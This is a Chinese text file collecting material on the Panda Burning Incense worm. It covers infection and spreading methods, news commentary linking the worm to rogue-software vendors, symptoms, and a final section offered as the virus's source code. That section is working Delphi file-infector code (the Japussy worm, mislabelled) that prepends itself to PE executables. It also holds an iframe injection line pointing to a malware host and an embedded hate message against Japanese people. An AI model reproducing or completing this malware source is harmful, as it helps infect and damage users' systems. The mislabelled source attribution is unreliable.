熊猫烧香百科.txt

这是我收集的熊猫烧香病毒的一些信息

Microsoft Frontpage
Movie Maker
MSN Gamin Zone
Common Files
Windows NT
Recycled
System Volume Information
Documents and Settings
……
(病毒将不感染文件名如下的文件):
setup.exe
NTDETECT.COM

病毒将使用两类感染方式应对不同后缀的文件名进行感染
    1)二进制可执行文件(后缀名为:EXE,SCR,PIF,COM): 将感染目标文件和病毒溶合成一个文件(被感染文件贴在病毒文件尾部)完成感染.
   
    2)脚本类(后缀名为:htm,html,asp,php,jsp,aspx): 在这些脚本文件尾加上如下链接(下边的页面存在安全漏洞):
    <iframe src=http://www.krvkr.com/worm.htm width=height=0></iframe>
在感染时会删除这些磁盘上的后缀名为.GHO

2.★生成autorun.inf
  病毒建立一个计时器以，6秒为周期在磁盘的根目录下生成setup.exe(病毒本身) autorun.inf 并利用AutoRun Open关联使病毒在用户点击被感染磁盘时能被自动运行。

3.★局域网传播
  病毒生成随机个局域网传播线程实现如下的传播方式：
当病毒发现能成功联接攻击目标的139或445端口后，将使用内置的一个用户列表及密码字典进行联接。（猜测被攻击端的密码）当成功的联接上以后将自己复制过去并利用计划任务启动激活病毒。
修改操作系统的启动关联
下载文件启动  
与杀毒软件对抗
   
【一些报道和评论】


“‘流氓软件’和病毒之间的界限已变得越来越模糊。为了达到更好的传播效果，并减少成本，不少中小厂商直接使用病毒进行‘流氓推广’。”昨日，反病毒专家直指流氓软件是这次“熊猫烧香”幕后黑手。

据江民公司反病毒工程师称，已经发现了近期疯狂肆虐的“熊猫烧香”幕后势力的痕迹，“熊猫烧香”病毒被怀疑是由“超级巡警”软件的提供方在幕后推动，网上已经发现了产销一条龙盗窃销售网游设备的产业链。

而从瑞星截获的“熊猫烧香(Worm.Nimaya)”样本进行分析，也有不少变种运行后会去从网上下载盗取“江湖”、“大话西游”、“魔兽”等网络游戏账号的木马。用户的计算机一旦被感染这些木马，游戏的账号、装备等就会被黑客窃取。黑客通过在网上倒卖网游账号、装备等获利。

流氓软件分化：部分“洗白” 部分病毒化。全民范围内的讨伐使流氓软件开始出现“分化”。

北京瑞星股份有限公司反病毒工程师史瑀向《每日经济新闻》表示，迫于技术和舆论的压力，制作流氓软件的厂商开始两极分化。一些大牌互联网厂商逐渐“洗白”，将软件的“流氓”程度降低，还有一些厂商干脆放弃推广“流氓软件”。然而，仍有大量的中小厂商是通过“流氓软件”起家的，通过“流氓软件”进行广告推广已经成为其公司主要甚至是唯一的收入来源。2006年下半年开始，一些厂商为了生存，不惜铤而走险，使用更加卑劣的手段进行流氓推广，并且采用更加恶毒的技术公然向反病毒软件、反流氓软件工具挑战。

据瑞星公司客户服务中心的统计数据表明，从2006年6月开始，用户计算机由于流氓软件问题导致崩溃的求助数量已经超过了病毒。

据专家介绍，这一时期的“流氓软件”有两大特点：一是编写病毒化。不少“流氓软件”为了防止被杀毒软件或流氓软件卸载工具发现，采用了病毒常用的 Rootkit技术进行自我保护。Rootkit可以对自身及指定的文件进行隐藏或锁定，防止被发现和删除。带有Rootkit的“流氓软件”就像练就了 “金钟罩”、“铁布杉”，不除去这层保护根本难伤其毫发。更有一些流氓软件，采用“自杀式”技术攻击杀毒软件。一旦发现用户安装或运行杀毒软件，便运行恶意代码，直接造成计算机死机、蓝屏，让用户误以为是杀毒软件存在问题。

二是传播病毒化。为了达到更好的传播效果，并减小成本，不少中小厂商直接使用病毒进行“流氓推广”。用户的计算机感染病毒后，病毒会自动在后台运行，下载并安装“流氓软件”。同时，“流氓软件”安装后也会去从互联网自动下载运行病毒。大量的“流氓软件”开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等，这些行为严重危害到用户的信息安全和利益。“流氓软件”和病毒之间的界限已变得越来越模糊。随着“流氓软件”不断朝着病毒的方向发展，要想彻底杀灭“流氓软件”就必须采用反病毒技术。

利益驱使 流氓软件制造“熊猫烧香”？

史瑀表示，2006年11月14日，瑞星发布流氓软件专用清除工具———卡卡上网安全助手3.0，首次将反病毒技术应用于反流氓软件当中。就在卡卡刚刚发布24小时，就有一个名为“my123”的恶意程序顶风作案，疯狂采用病毒化的编写技术来逃避卡卡的追杀，随后又出现了名为“3448.com”和 “7939.com”两个流氓软件，它们锁定用户浏览器的首页以提高其网站访问量。

此后，部分流氓软件开始和病毒合作。早先一个传播较广的蠕虫病毒“威金蠕虫(Worm.Viking)”，就会从病毒作者指定的网站去下载流氓软件、盗号木马等，并种植在用户的计算机上。

“大量‘流氓软件’开始使用电脑病毒来隐藏自身、进行快速传播、并对抗用户的清除等，这些行为严重危害到用户的信息安全和利益。”史瑀称，“‘熊猫烧香’病毒成为一个‘教科书’式的病毒，势必有大量的病毒会模仿它的特征进行编写。”

1月29日，金山毒霸反病毒中心最新消息：“熊猫烧香”化身“金猪”，危害指数再度升级，按照目前“熊猫烧香”破坏程度，威胁将延伸至春节。而在瑞星全球反病毒监测网27日监测结果显示，27日一个“电眼间谍变种BSF(Trojan.Spy.Delf.bsf)”病毒又出现，该病毒与“熊猫烧香”病毒类似。

而业内人士称，近日由于地震引起海底光缆中断，造成数百万使用国外杀毒软件的个人用户、数十万企业和政府局域网用户无法升级。这又意味着这些用户的电脑完全向病毒和黑客敞开了大门。

“在没有法律法规出台前，流氓软件是不会缩手的，不排除‘熊猫烧香’是流氓软件所为。”昨日，中国反流氓软件联盟李佳衡表示：“只要有利益驱使，流氓软件就会变化形式，以更不容易察觉的病毒方式毫无忌惮地牟取利益。”

熊猫烧香”化身“金猪”，春节大爆发。

“长假是病毒的高发期，特别是长假之后，病毒综合症接踵而来。”金山毒霸反病毒专家戴光剑说，“目前我们已经截获‘金猪’的变种。被感染的电脑中不但‘熊猫’成群，而且‘金猪’能使系统被破坏，大量软件无法应用。”这一观点得到了上海市计算机病毒防范服务中心的认同。

一旦中毒，用户也不用慌张，用户可拨打上海市信息化服务热线电话9682000寻求帮助。张丹

“熊猫烧香”病毒攻略：防御和解除方法

　　计世网消息在2007年新年出现的“PE_FUJACKS”就是最近让广大互联网用户闻之色变的“熊猫烧香”。该病毒的作者为“武汉男生”(文件末签名” WhBoy”)，这个版本的病毒已经集成了PE_FUJA CK和QQ大盗的代码，通过网络共享,文件感染和移动存储设备传播，尤其是感染网页文件，并在网页文件写入自动更新的代码，一旦浏览该网页，就会感染更新后的变种。

　　不幸中招的用户都知道，“熊猫烧香”会占用局域网带宽，使得电脑变得缓慢，计算机会出现以下症状：熊猫烧香病毒会在网络共享文件夹中生成一个名为 GameSetup.exe的病毒文件；结束某些应用程序以及防毒软件的进程，导致应用程序异常，或不能正常执行，或速度变慢；硬盘分区或者U盘不能访问使用；exe程序无法使用程序图标变成熊猫烧香图标；硬盘的根目录出现setup.exe auturun.INF文件；同时浏览器会莫名其妙地开启或关闭。

　　该病毒主要通过浏览恶意网站、网络共享、文件感染和移动存储设备(如U盘)等途径感染，其中网络共享和文件感染的风险系数较高，而通过Web和移动存储感染的风险相对较低。该病毒会自行启动安装，生成注册列表和病毒文件%System%\drivers\spoclsv.exe ，并在所有磁盘跟目录下生成病毒文件setup.exe,autorun.inf 。


【熊猫烧香的病毒源码】

program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432;             //病毒体的大小
IconOffset = EB8;           //PE文件主图标的偏移量

//在我的Delphi5 SP1上面编译得到的大小，其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
  
{
HeaderSize = 38912;             //Upx压缩过病毒体的大小
IconOffset = BC;             //Upx压缩过PE文件主图标的偏移量

//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize   = E8;             //PE文件主图标的大小--744字节
IconTail   = IconOffset + IconSize; //PE文件主图标的尾部
ID       = 444444;         //感染标记

//垃圾码，以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
        'If a country need to be destroyed, it must be Japan! ' +
        '*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stDCall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si:     STARTUPINFO;
Pi:     PROCESS_INFORMATION;
IsJap:   Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
  Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
  Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来，以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
  sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
  try
    dStream := TFileStream.Create(FileName, fmCreate);
    try
    sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
    dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
    finally
    dStream.Free;
    end;
  finally
    sStream.Free;
  end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之？
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用，退出
  if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
    Exit;
  Infected := False;
  IsPE   := False;
  SrcStream := TFileStream.Create(FileName, fmOpenRead);
  try
    for i := 0 to 8 do //检查PE文件头
    begin
    SrcStream.Seek(i, soFromBeginning);
    SrcStream.Read(Buf, 2);
    if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
    begin
      IsPE := True; //是PE文件
      Break;
    end;
    end;
    SrcStream.Seek(-4, soFromEnd); //检查感染标记
    SrcStream.Read(iID, 4);
    if (iID = ID) or (SrcStream.Size < 10240) then //太小的文件不感染
    Infected := True;
  finally
    SrcStream.Free;
  end;
  if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
    Exit;
  IcoStream := TMemoryStream.Create;
  DstStream := TMemoryStream.Create;
  try
    aIcon := TIcon.Create;
    try
    //得到被感染文件的主图标(744字节)，存入流
    aIcon.ReleaseHandle;
    aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
    aIcon.SaveToStream(IcoStream);
    finally
    aIcon.Free;
    end;
    SrcStream := TFileStream.Create(FileName, fmOpenRead);
    //头文件
    HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
    try
    //写入病毒体主图标之前的数据
    CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
    //写入目前程序的主图标
    CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
    //写入病毒体主图标到病毒体尾部之间的数据
    CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
    //写入宿主程序
    CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
    //写入已感染的标记
    DstStream.Seek(0, 2);
    iID := 444444;